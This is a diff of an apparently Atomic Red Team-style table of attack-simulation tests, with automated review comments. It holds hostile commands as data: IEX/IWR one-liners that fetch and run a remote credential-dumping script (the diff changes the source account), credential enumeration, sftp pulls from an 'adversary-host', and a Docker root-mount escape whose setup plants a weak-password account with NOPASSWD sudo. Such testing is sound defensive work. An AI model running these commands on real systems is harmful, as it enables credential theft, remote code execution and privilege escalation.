-ForegroundColor Green | | +| | | | | | | | | | | | | | | } catch { | input_arguments.local_path.default: C:\temp | +| | | | | | | | | | | | | | | # Handle any errors that occur during the installation process | | +| | | | | | | | | | | | | | | Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red | input_arguments.file_name.description: Name of the file to transfer | +| | | | | | | | | | | | | | | } | | +| | | | | | | | | | | | | | | | input_arguments.file_name.type: string | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | | input_arguments.file_name.default: T1105.txt | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | | input_arguments.username.description: User account to authenticate on remote host | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | | input_arguments.username.type: string | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | | input_arguments.username.default: adversary | +| T1105 | Ingress Tool Transfer | Windows pull file using sftp.exe | 3d25f1f2-55cb-4a41-a523-d17ad4cfba19 | This test simulates pulling files using SFTP on a Windows environment. | windows | nan | nan | sftp.exe #{username}@#{remote_host}:#{remote_path} #{local_path} | powershell | 1 | nan | nan | powershell | dependencies.0.description: This test requires the `sftp` command to be available on the system. | input_arguments.remote_path.description: Path of file to pull | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | dependencies.0.prereq_command: if (Get-Command sftp -ErrorAction SilentlyContinue) { | input_arguments.remote_path.type: path | +| | | | | | | | | | | | | | | Write-Output "SFTP command is available." | | +| | | | | | | | | | | | | | | exit 0 | input_arguments.remote_path.default: /tmp/T1105.txt | +| | | | | | | | | | | | | | | } else { | | +| | | | | | | | | | | | | | | Write-Output "SFTP command is not available." 
| input_arguments.remote_host.description: Remote host to pull from | +| | | | | | | | | | | | | | | exit 1 | | +| | | | | | | | | | | | | | | } | input_arguments.remote_host.type: string | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | dependencies.0.get_prereq_command: # Define the capability name for OpenSSH Client | input_arguments.remote_host.default: adversary-host | +| | | | | | | | | | | | | | | $capabilityName = "OpenSSH.Client~~~~0.0.1.0" | | +| | | | | | | | | | | | | | | try { | input_arguments.local_path.description: Local path to receive files | +| | | | | | | | | | | | | | | # Install the OpenSSH Client capability | | +| | | | | | | | | | | | | | | Add-WindowsCapability -Online -Name $capabilityName -ErrorAction Stop | input_arguments.local_path.type: path | +| | | | | | | | | | | | | | | Write-Host "OpenSSH Client has been successfully installed." -ForegroundColor Green | | +| | | | | | | | | | | | | | | } catch { | input_arguments.local_path.default: C:\temp | +| | | | | | | | | | | | | | | # Handle any errors that occur during the installation process | | +| | | | | | | | | | | | | | | Write-Host "An error occurred while installing OpenSSH Client: $_" -ForegroundColor Red | input_arguments.username.description: User account to authenticate on remote host | +| | | | | | | | | | | | | | | } | | +| | | | | | | | | | | | | | | | input_arguments.username.type: string | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | | input_arguments.username.default: adversary | | T1006 | Direct Volume Access | Read volume boot sector via DOS device path (PowerShell) | 88f6327e-51ec-4bbf-b2e8-3fea534eab8b | This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume. 
| windows | nan | nan | $buffer = New-Object byte[] 11 | powershell | 1 | nan | nan | nan | nan | input_arguments.volume.description: Drive letter of the volume to access | | | | | | On success, a hex dump of the first 11 bytes of the volume is displayed. | | | | $handle = New-Object IO.FileStream "\\.\#{volume}", 'Open', 'Read', 'ReadWrite' | | | | | | | | | | | | | | | | | $handle.Read($buffer, 0, $buffer.Length) | | | | | | | input_arguments.volume.type: string | 
@@ -3826,8 +3905,8 @@ | | | | | | | | | | | | | | | } catch { exit 1 } | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | dependencies.0.get_prereq_command: Write-Host "You will need to install Microsoft Word manually to meet this requirement" | |
-| T1555 | Credentials from Password Stores | Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] | c89becbe-1758-4e7d-a0f4-97d2188a23e3 | This module will extract the credentials from Windows Credential Manager | windows | nan | nan | IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force | powershell | 0 | nan | nan | nan | nan | nan |
-| T1555 | Credentials from Password Stores | Dump credentials from Windows Credential Manager With PowerShell [web Credentials] | 8fd5a296-6772-4766-9991-ff4e92af7240 | This module will extract the credentials from Windows Credential Manager | windows | nan | nan | IEX (IWR 'https://raw.githubusercontent.com/skar4444/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force | powershell | 0 | nan | nan | nan | nan | nan |
+| T1555 | Credentials from Password Stores | Dump credentials from Windows Credential Manager With PowerShell [windows Credentials] | c89becbe-1758-4e7d-a0f4-97d2188a23e3 | This module will extract the credentials from Windows Credential Manager | windows | nan | nan | IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-PasswordVaultCredentials -Force | powershell | 0 | nan | nan | nan | nan | nan |
+| T1555 | Credentials from Password Stores | Dump credentials from Windows Credential Manager With PowerShell [web Credentials] | 8fd5a296-6772-4766-9991-ff4e92af7240 | This module will extract the credentials from Windows Credential Manager | windows | nan | nan | IEX (IWR 'https://raw.githubusercontent.com/TriggerMan-S/Windows-Credential-Manager/4ad208e70c80dd2a9961db40793da291b1981e01/GetCredmanCreds.ps1' -UseBasicParsing); Get-CredManCreds -Force | powershell | 0 | nan | nan | nan | nan | nan | | T1555 | Credentials from Password Stores | Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Windows Credentials] | 36753ded-e5c4-4eb5-bc3c-e8fba236878d | This module will enumerate credentials stored in Windows Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe | windows | nan | nan | vaultcmd /listcreds:"Windows Credentials" /all | powershell | 0 | nan | nan | nan | nan | nan | | T1555 | Credentials from Password Stores | Enumerate credentials from Windows Credential Manager using vaultcmd.exe [Web Credentials] | bc071188-459f-44d5-901a-f8f2625b2d2e | This module will enumerate credentials stored in Web Credentials vault of Windows Credential Manager using builtin utility vaultcmd.exe | windows | nan | nan | vaultcmd /listcreds:"Web Credentials" /all | powershell | 0 | nan | nan | nan | nan | nan | | T1555 | Credentials from Password Stores | WinPwn - Loot local Credentials - lazagne | 079ee2e9-6f16-47ca-a635-14efcd994118 | The [LaZagne project](https://github.com/AlessandroZ/LaZagne) is an open source application used to retrieve lots of passwords stored on a local computer. | windows | nan | nan | $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' | powershell | nan | nan | nan | nan | nan | nan |
@@ -6892,6 +6971,19 @@ | | | | | | | | | | | | | | | | input_arguments.listen_port.type: integer | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | input_arguments.listen_port.default: 4444 |
+| T1611 | Escape to Host | Privilege Escalation via Docker Volume Mapping | 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4 | This test demonstrates privilege escalation by abusing Docker's volume mapping | containers | nan | nan | echo "Current user: #{username}" | sh | 1 | nan | USERNAME="#{username}"; SUDOERS_FILE="/etc/sudoers.d/$USERNAME"; id "$USERNAME" &>/dev/null && userdel -r "$USERNAME" && echo -e "$USERNAME is deleted."; [[ -f "$SUDOERS_FILE" ]] && rm -f "$SUDOERS_FILE"; echo "Cleanup complete." | nan | dependencies.0.description: Docker | input_arguments.username.default: docker_user |
+| | | | | feature to gain access to the host file system. By mounting the root directory | | | | sudo -u docker_user sh -c "sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id" | | | | | | dependencies.0.prereq_command: command -v docker &> /dev/null && echo "Docker is installed" || { echo "Docker is not installed."; exit 1; } | |
+| | | | | of the host into a Docker container, the attacker can use chroot to operate as | | | | | | | | | | | input_arguments.username.description: Username that run attack command |
+| | | | | root on the host system. | | | | | | | | | | dependencies.0.get_prereq_command: echo "You should install docker manually." | |
+| | | | | | | | | | | | | | | | input_arguments.username.type: string |
+| | | | | | | | | | | | | | | dependencies.1.description: Docker Privileged User | |
+| | | | | | | | | | | | | | | dependencies.1.prereq_command: sudo -l -U #{username} | grep "(ALL) NOPASSWD: /usr/bin/docker" | |
+| | | | | | | | | | | | | | | | |
+| | | | | | | | | | | | | | | dependencies.1.get_prereq_command: USERNAME="#{username}" | |
+| | | | | | | | | | | | | | | PASSWORD="password123" | |
+| | | | | | | | | | | | | | | SUDO_COMMAND="/usr/bin/docker" | |
+| | | | | | | | | | | | | | | SUDOERS_FILE="/etc/sudoers.d/$USERNAME" | |
+| | | | | | | | | | | | | | | [[ $EUID -ne 0 ]] && echo "Run as root." && exit 1; id "$USERNAME" &>/dev/null || { useradd -m -s /bin/bash "$USERNAME" && echo "$USERNAME:$PASSWORD" | chpasswd; }; [[ -f "$SUDOERS_FILE" ]] || { echo "$USERNAME ALL=(ALL) NOPASSWD: $SUDO_COMMAND" > "$SUDOERS_FILE" && chmod 440 "$SUDOERS_FILE"; }; echo "Setup complete. User: $USERNAME, Password: $PASSWORD" | | | T1001.002 | Data Obfuscation via Steganography | Steganographic Tarball Embedding | c7921449-8b62-4c4d-8a83-d9281ac0190b | This atomic test, named "Steganographic Tarball Embedding", simulates the technique of data obfuscation via steganography by embedding a tar archive file (tarball) | windows | nan | nan | Get-Content "#{image_file}", "#{tar_file}" -Encoding byte -ReadCount 0 | Set-Content "#{new_image_file}" -Encoding byte | powershell | 1 | nan | Set-ExecutionPolicy Bypass -Scope Process -Force -ErrorAction Ignore | powershell | dependencies.0.description: Image file must exist | input_arguments.image_file.description: Image file which will be downloaded to be used to hide data | | | | | | within an image. | | | | | | | | Remove-Item -Path "#{new_image_file}" -Force -ErrorAction Ignore | | | | | | | | | | | | | | | | | | | dependencies.0.prereq_command: if (!(Test-Path "#{image_file}")) {exit 1} else { | input_arguments.image_file.type: path |
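Review bot: The T1611 attack command on the second added row hard-codes the account, `sudo -u docker_user sh -c "..."`, while the cleanup and both dependency commands key off `#{username}`; overriding the input argument therefore provisions and tears down one account but executes as another, so it should read `sudo -u #{username} sh -c "sudo docker run -v /:/mnt --rm --name t1611_privesc -it alpine chroot /mnt id"`. The row declares the executor as `sh`, yet the cleanup and dependencies.1.get_prereq_command rely on `[[ … ]]`, `&>/dev/null` and `echo -e`, which are bash-only and fail or behave differently under a POSIX /bin/sh such as dash. dependencies.1.get_prereq_command also creates a persistent local account with the fixed password `password123` plus a NOPASSWD sudo rule for /usr/bin/docker, and only the cleanup step removes them, so an aborted run leaves a standing privilege-escalation path on the host; the description should state this and that the test must only run on a disposable machine. If this table is an automated extraction of upstream test definitions, these fixes belong in the source YAML rather than in this commit.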
@@ -10811,35 +10903,39 @@ | | | | | | | | | | | | | | | | input_arguments.output-key-file.type: string | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | input_arguments.output-key-file.default: gcp-art-service-account-1.json | -| T1078.004 | Valid Accounts: Cloud Accounts | Azure Persistence Automation Runbook Created or Modified | 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac | Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure | iaas:azure | nan | nan | $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force | powershell | 0 | nan | Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force | powershell | dependencies.0.description: Check if terraform is installed. | input_arguments.username.description: Azure username | -| | | | | Automation runbook to execute malicious code and maintain persistence in their target's environment. | | | | $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd | | | | cd "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/" | | | | -| | | | | | | | | Connect-AzAccount -Credential $creds | | | | terraform destroy -auto-approve | | dependencies.0.prereq_command: terraform version | input_arguments.username.type: string | -| | | | | | | | | New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name} | | | | | | | | -| | | | | | | | | | | | | | | dependencies.0.get_prereq_command: echo Please install terraform. 
| input_arguments.username.default: None | -| | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.1.description: Install-Module -Name Az | input_arguments.password.description: Azure password | -| | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.1.prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} | input_arguments.password.type: string | -| | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.1.get_prereq_command: Install-Module -Name Az -Scope CurrentUser -Force | input_arguments.password.default: None | -| | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.2.description: Check if the user is logged into Azure. | input_arguments.resource_group.description: Name of the resource group | +| T1078.004 | Valid Accounts: Cloud Accounts | Azure Persistence Automation Runbook Created or Modified | 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac | Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure | iaas:azure | nan | nan | New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name} | powershell | 0 | nan | Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force | powershell | dependencies.0.description: Check if terraform is installed. | input_arguments.resource_group.description: Name of the resource group | +| | | | | Automation runbook to execute malicious code and maintain persistence in their target's environment. 
| | | | | | | | Remove-AzAutomationAccount -ResourceGroupName #{resource_group} -Name #{automation_account_name} -Force | | | | +| | | | | | | | | | | | | Remove-AzResourceGroup -Name #{resource_group} -Force | | dependencies.0.prereq_command: terraform version | input_arguments.resource_group.type: string | +| | | | | | | | | | | | | echo "Cleanup should be completed. Run 'terraform destroy` to ensure remaining resources are also deleted." | | | | +| | | | | | | | | | | | | cd "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/" | | dependencies.0.get_prereq_command: echo "Please install terraform via https://developer.hashicorp.com/terraform/tutorials/aws-get-started/install-cli (URL accurate as of Nov. 15, 2024)." | input_arguments.resource_group.default: ART-ResourceGroupName-T1078-004 | +| | | | | | | | | | | | | terraform destroy -auto-approve | | | | +| | | | | | | | | | | | | | | dependencies.1.description: Check if Azure CLI and Azure Powershell are installed. | input_arguments.runbook_name.description: Name of the runbook name | +| | | | | | | | | | | | | | | | | +| | | | | | | | | | | | | | | * Login to Azure CLI with "az login", and login to Azure Powershell with "Connect-AzAccount". Sessions are not shared. | input_arguments.runbook_name.type: string | +| | | | | | | | | | | | | | | * Azure Powershell used in this test as they have better automation performance and error logging than Azure CLI. 
| | +| | | | | | | | | | | | | | | | input_arguments.runbook_name.default: ART-RunbookName-T1078-004 | +| | | | | | | | | | | | | | | dependencies.1.prereq_command: try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1} | | +| | | | | | | | | | | | | | | | input_arguments.automation_account_name.description: Name of the automation account name | +| | | | | | | | | | | | | | | dependencies.1.get_prereq_command: $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindowsx64 -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi | | +| | | | | | | | | | | | | | | | input_arguments.automation_account_name.type: string | +| | | | | | | | | | | | | | | dependencies.2.description: Check if the user is logged into Azure. | | +| | | | | | | | | | | | | | | | input_arguments.automation_account_name.default: ART-AutomationAccountName-T1078-004 | +| | | | | | | | | | | | | | | dependencies.2.prereq_command: try {if (-not (Get-AzContext)) { exit 1 } else { exit 0 }} catch {exit 1} | | | | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.2.prereq_command: az account show | input_arguments.resource_group.type: string | +| | | | | | | | | | | | | | | dependencies.2.get_prereq_command: echo "* Configure your Azure account using: Connect-AzAccount" | | | | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.2.get_prereq_command: echo Configure your Azure account using: az login. 
| input_arguments.resource_group.default: None | +| | | | | | | | | | | | | | | dependencies.3.description: Create dependency resources using terraform | | | | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.3.description: Create dependency resources using terraform | input_arguments.runbook_name.description: Name of the runbook name | +| | | | | | | | | | | | | | | * If fail to meet prereq, navigate to T1078.004-2 using "cd $PathToAtomicsFolder/T1078.004/src/T1078.004-2/" | | +| | | | | | | | | | | | | | | * Open the "terraform.tfvars" file and fill in the variables with your desired values. | | +| | | | | | | | | | | | | | | * Re-run -GetPrereqs | | | | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.3.prereq_command: try {if (Test-Path "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1} | input_arguments.runbook_name.type: string | +| | | | | | | | | | | | | | | dependencies.3.prereq_command: try {if (Test-Path "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/terraform.tfstate" ){ exit 0 } else {exit 1}} catch {exit 1} | | | | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | dependencies.3.get_prereq_command: cd "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/" | input_arguments.runbook_name.default: None | +| | | | | | | | | | | | | | | dependencies.3.get_prereq_command: echo "Navigating to: $PathToAtomicsFolder/T1078.004/src/T1078.004-2/" | | +| | | | | | | | | | | | | | | cd "$PathToAtomicsFolder/T1078.004/src/T1078.004-2/" | | | | | | | | | | | | | | | | | terraform init | | -| | | | | | | | | | | | | | | terraform apply -auto-approve | input_arguments.automation_account_name.description: Name of the automation account name | -| | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | | input_arguments.automation_account_name.type: string | -| | | | | | | | | | | | | | | | | -| | | | | | | | | | | | | | | | 
input_arguments.automation_account_name.default: None | +| | | | | | | | | | | | | | | terraform apply -auto-approve | | | T1078.004 | Valid Accounts: Cloud Accounts | GCP - Create Custom IAM Role | 3a159042-69e6-4398-9a69-3308a4841c85 | This atomic will create a new IAM role. The default role permissions are: *IAM Service Account Get*. The idea for this Atomic came from a Rule published by the Elastic team. | iaas:gcp | nan | nan | gcloud config set project #{project-id} | sh | 0 | nan | gcloud iam roles delete #{role-name} --project=#{project-id} | sh | dependencies.0.description: Requires gcloud | input_arguments.project-id.description: ID of the GCP Project you to execute the command against. | | | | | | | | | | gcloud iam roles create #{role-name} --description="#{role-description}" --permissions=#{roles} --project=#{project-id} | | | | | | | | | | | | | Identifies an Identity and Access Management (IAM) custom role creation in Google Cloud Platform (GCP). | | | | | | | | | | dependencies.0.prereq_command: if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; | input_arguments.project-id.type: string |
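Review bot: In the rewritten T1078.004 row, dependencies.1 is inconsistent with itself: its prereq_command passes only when `Get-InstalledModule -Name Az` succeeds, but its get_prereq_command installs the Azure CLI MSI and never the Az module, so -GetPrereqs cannot satisfy the check it is paired with; the removed row's `Install-Module -Name Az -Scope CurrentUser -Force` should be restored there, or the check should test for the CLI it installs. That same get_prereq downloads from aka.ms and runs it through `msiexec.exe /quiet` with no signature or hash check, which deserves a note in the dependency description. The new cleanup line `echo "Cleanup should be completed. Run 'terraform destroy` to ensure remaining resources are also deleted."` mixes a single quote with a backtick and should read `Run 'terraform destroy' to ensure …`. If this table is generated from upstream test definitions, the fixes belong in the source YAML.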